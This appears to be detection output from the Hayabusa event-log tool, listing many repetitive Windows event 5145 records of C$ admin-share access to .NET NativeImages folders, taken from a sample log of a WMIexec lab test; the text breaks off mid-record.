0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 
| LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# | IP Addr: 
10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# | IP 
Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# | IP Addr: 
10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# | IP 
Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp | IP 
Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# | IP 
Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# | 
IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# 
| IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
